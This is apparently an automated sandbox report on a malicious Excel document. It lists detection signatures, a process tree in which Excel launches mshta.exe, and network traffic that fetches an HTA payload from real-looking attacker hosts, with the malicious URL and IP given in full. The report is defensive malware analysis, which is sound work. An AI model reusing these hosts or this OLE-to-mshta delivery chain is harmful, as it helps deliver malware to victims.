Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Document.xla.xlsx

Overview

General Information

Sample name:Document.xla.xlsx
Analysis ID:1576236
MD5:d4c6ac821c22be30144711786c736a1a
SHA1:96e697734dd3dcc47ebbe6bb9d3f1055f096c4f7
SHA256:ab5152794ca45d670ae3f13de6be92fb686c27705d2df9ce0c00f76717bc61f3
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Microsoft Office drops suspicious files
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 7688 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • mshta.exe (PID: 6616 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
    • splwow64.exe (PID: 6836 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • appidpolicyconverter.exe (PID: 7304 cmdline: "C:\Windows\system32\appidpolicyconverter.exe" MD5: 6567D9CF2545FAAC60974D9D682700D4)
    • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
  • EXCEL.EXE (PID: 1932 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Document.xla.xlsx" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 7688, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\SAPTEQZX\createdbetterthingswithgreatnressgivenmebackwithnice[1].hta
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7688, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 6616, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 170.82.174.30, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7688, Protocol: tcp, SourceIp: 192.168.2.26, SourceIsIpv6: false, SourcePort: 49699
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.26, DestinationIsIpv6: false, DestinationPort: 49699, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7688, Protocol: tcp, SourceIp: 170.82.174.30, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2Avira URL Cloud: Label: malware
Source: https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&moodAvira URL Cloud: Label: malware
Source: Document.xla.xlsxReversingLabs: Detection: 21%
Source: Document.xla.xlsxJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
Source: global trafficDNS query: name: curt.wiz.co
Source: global trafficDNS query: name: assets.msn.com
Source: global trafficDNS query: name: assets.msn.com
Source: global trafficDNS query: name: ecn.dev.virtualearth.net
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.26:49699
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.26:49699
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.26:49699
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.26:49699
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.26:49699
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.26:49699
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.26:49699
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.26:49699
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.26:49699
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.26:49699
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.26:49699
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.26:49699
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 170.82.174.30:443 -> 192.168.2.26:49699
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49699 -> 170.82.174.30:443
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.26:49704
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: global trafficTCP traffic: 192.168.2.26:49704 -> 172.245.123.12:80
Source: Joe Sandbox ViewIP Address: 170.82.174.30 170.82.174.30
Source: Joe Sandbox ViewIP Address: 170.82.174.30 170.82.174.30
Source: global trafficHTTP traffic detected: GET /VvBBUAl9Ti?&compulsion=zealous&mood HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /VvBBUAl9Ti?&compulsion=zealous&mood HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: curt.wiz.coConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /233/eec/createdbetterthingswithgreatnressgivenmebackwithnice.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.123.12
Source: global trafficDNS traffic detected: DNS query: curt.wiz.co
Source: global trafficDNS traffic detected: DNS query: assets.msn.com
Source: global trafficDNS traffic detected: DNS query: ecn.dev.virtualearth.net
Source: Document.xla.xlsx, 4F920000.0.drString found in binary or memory: https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2
Source: Primary1734365485648207300_E7993156-510D-4FB3-9572-1399A080918F.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/flatfontassets.pkg
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699

System Summary

barindex
Source: Document.xla.xlsxOLE: Microsoft Excel 2007+
Source: Document.xla.xlsxOLE: Microsoft Excel 2007+
Source: Document.xla.xlsxOLE: Microsoft Excel 2007+
Source: Document.xla.xlsxOLE: Microsoft Excel 2007+
Source: ~DFB731AFE910C5A953.TMP.0.drOLE: Microsoft Excel 2007+
Source: 4F920000.0.drOLE: Microsoft Excel 2007+
Source: 4F920000.0.drOLE: Microsoft Excel 2007+
Source: 4F920000.0.drOLE: Microsoft Excel 2007+
Source: 4F920000.0.drOLE: Microsoft Excel 2007+
Source: ~DFAAF0B9441B87F65F.TMP.0.drOLE: Microsoft Excel 2007+
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\SAPTEQZX\createdbetterthingswithgreatnressgivenmebackwithnice[1].htaJump to behavior
Source: Document.xla.xlsxOLE indicator, VBA macros: true
Source: 4F920000.0.drOLE indicator, VBA macros: true
Source: Document.xla.xlsxStream path 'MBD010681DE/\x1Ole' : https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2h6jl/+kw^EMY%q*1W_Ua^8U\hn8[#+o$j=ru]2uhkN8EWIJW7=>1[&o%XWG1ygEnllZuiJ4eX3jO8wnPvcj0aiVH7z4PcIFxDFm5AJmEGQrkKJjBBimLsrH41avolZKeP8bFWxIXc6PjnfrNnfq0B$HS[;<8/I4#m
Source: 4F920000.0.drStream path 'MBD010681DE/\x1Ole' : https://curt.wiz.co/VvBBUAl9Ti?&compulsion=zealous&mood2h6jl/+kw^EMY%q*1W_Ua^8U\hn8[#+o$j=ru]2uhkN8EWIJW7=>1[&o%XWG1ygEnllZuiJ4eX3jO8wnPvcj0aiVH7z4PcIFxDFm5AJmEGQrkKJjBBimLsrH41avolZKeP8bFWxIXc6PjnfrNnfq0B$HS[;<8/I4#m
Source: ~DFB731AFE910C5A953.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFAAF0B9441B87F65F.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'document.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal80.expl.winXLSX@8/37@4/2
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Document.xla.xlsxJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7312:120:WilError_03
Source: C:\Windows\System32\appidpolicyconverter.exeMutant created: PolicyMutex
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{E7993156-510D-4FB3-9572-1399A080918F} - OProcSessId.datJump to behavior
Source: Document.xla.xlsxOLE indicator, Workbook stream: true
Source: 4F920000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Document.xla.xlsxReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\appidpolicyconverter.exe "C:\Windows\system32\appidpolicyconverter.exe"
Source: C:\Windows\System32\appidpolicyconverter.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Document.xla.xlsx"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: c2r64.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: Document.xla.xlsxStatic file information: File size 1106944 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: ~DFB731AFE910C5A953.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: Document.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
